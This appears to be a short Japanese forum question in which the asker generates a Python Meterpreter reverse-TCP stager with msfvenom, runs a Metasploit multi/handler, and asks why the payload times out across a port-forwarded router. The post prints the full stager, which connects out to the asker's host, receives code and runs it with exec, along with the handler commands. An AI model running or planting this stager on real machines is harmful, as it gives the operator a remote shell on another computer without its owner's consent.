私はmsfvenom
次のpythonペイロードを作成するために使用しました:
import socket,struct
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('MY PUBLIC IP',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
d+=s.recv(l-len(d))
exec(d,{'s':s})
次に、 を開きmsfconsole
、次のことを行いました。
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.0.186 (MY LOCAL IP)
set LPORT 3930
exploit
192.168.0.186:3930 でリバース TCP ハンドラーを開始し、ペイロード ハンドラーも開始します。しかし、別のコンピューターでスクリプトを実行すると、約 1 分待ってからペイロードがタイムアウトし、msfconsole は何も登録しません。ルーターで 3930 にポート転送しました。ここで何が間違っていますか?